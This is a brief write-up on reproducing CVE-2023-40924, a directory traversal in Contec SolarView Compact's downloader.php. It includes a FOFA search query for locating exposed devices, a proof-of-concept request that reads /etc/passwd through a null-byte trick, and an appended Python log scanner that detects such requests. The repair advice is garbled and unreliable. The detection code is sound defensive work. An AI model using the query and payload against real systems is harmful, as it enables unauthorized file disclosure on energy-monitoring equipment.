Reproducing the directory traversal vulnerability CVE-2023-40924 in SolarView Compact, a Japanese photovoltaic power generation measurement system
Disclaimer: Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by disseminating or using the information or tools provided in this article are the responsibility of the user; the author of the article bears no responsibility for any adverse consequences. This article is for educational purposes only.
1. System introduction
Contec is a company focusing on customized embedded computing, industrial automation and IoT communication technologies. Contec SolarView Compact is an application system from Contec that can be used for remote performance monitoring, troubleshooting, system optimization and other functions to remotely manage renewable energy production units.
2. Vulnerability description
Attackers exploit this vulnerability through downloader.php: directory traversal sequences passed in the file parameter allow sensitive files to be read.
3. Affected versions
SolarView Compact < 6.00
4. FOFA query
body="SolarView Compact" && title="Top"
5. Vulnerability reproduction
Request the URL directly in the browser and capture the packet with Burp.
6. POC & EXP
/downloader.php?file=…/…/…/…/…/…/…/…/etc/passwd%00.jpg
7. Repair suggestions
Don't discharge randomly
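A detection check for the request pattern described in sections 2 and 6, as an added example that is not part of the original article or of Contec's code: it scans web access log lines for requests to downloader.php whose file parameter, after repeated URL-decoding, contains a parent-directory segment, a null byte or an absolute path. The log lines are constructed samples, and the function names and log format are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in common log format (not taken from a real system).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Sep/2023:10:00:01 +0900] "GET /downloader.php?file=report_202308.csv HTTP/1.1" 200 5120
192.0.2.77 - - [01/Sep/2023:10:02:13 +0900] "GET /downloader.php?file=../../../../etc/passwd%00.jpg HTTP/1.1" 200 1843
192.0.2.77 - - [01/Sep/2023:10:02:15 +0900] "GET /downloader.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
192.0.2.10 - - [01/Sep/2023:10:05:40 +0900] "GET /index.html HTTP/1.1" 200 900
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """URL-decode repeatedly so double-encoded sequences (%252e) are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_reasons(file_param):
    """Return the reasons a 'file' value is suspicious (empty list if none)."""
    decoded = fully_decode(file_param).replace("\\", "/")
    reasons = []
    if ".." in decoded.replace("\x00", "").split("/"):
        reasons.append("parent-directory segment")
    if "\x00" in decoded:  # %00 used to cut off a trailing extension such as .jpg
        reasons.append("null byte")
    if decoded.startswith("/"):
        reasons.append("absolute path")
    return reasons

def scan(log_text):
    """Return (client_ip, http_status, reasons) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/downloader.php"):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = traversal_reasons(value) if name == "file" else []
            if reasons:
                findings.append((line.split()[0], int(m.group(2)), reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request that returned status 200 deserves priority in triage, since the file may have been served.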